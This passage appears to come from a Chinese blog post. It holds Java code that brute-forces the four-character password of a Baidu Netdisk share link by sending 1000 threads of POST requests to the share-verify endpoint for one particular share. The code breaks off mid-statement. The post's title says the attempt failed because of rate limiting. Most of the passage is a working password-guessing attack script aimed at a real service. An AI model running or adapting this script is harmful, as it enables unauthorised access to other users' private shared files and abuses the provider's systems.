class PAN_BAIDU {
public void execute() throws InterruptedException {
ExecutorService es = Executors.newFixedThreadPool(1000);
Map<String,BufferedWriter> WMAP = new HashMap<>(CODES_ALL.length+5,1f);
for (char c1 : CODES_ALL) {
for (char c2 : CODES_ALL) {
for (char c3 : CODES_ALL) {
for (char c4 : CODES_ALL) {
es.execute(()->{
String pwd = "" + c1 + c2 + c3 + c4;
String href = "https://pan.baidu.com/share/verify?web=5&app_id=250528"
+ "&logid=MTYxMzYxMjQxNzAzOTAuNDkxMDc2MDQ2Njc0ODg0"
+ "&channel=chunlei"
+ "&clienttype=5"
+ "&surl=v1gyxFpfuFC0EIMilT3tpg"
+ "&t=" + System.currentTimeMillis()
+ "&linksource="
+ "&csign=9314e3721b5dc3557ec21065ad483b83";
HttpPost post = new HttpPost(href);
post.setHeader("Accept", "application/json, text/plain, */*");
post.setHeader("Accept-Encoding", "gzip, deflate, br");
post.setHeader("Accept-Language", "zh-CN,zh;q=0.9");
post.setHeader("Cache-Control", "no-cache");
post.setHeader("Connection", "keep-alive"
想暴力破解百度网盘分享密码? 别想了,至少我做不到,被限流降级了 手动表情哭
最新推荐文章于 2025-03-13 15:32:48 发布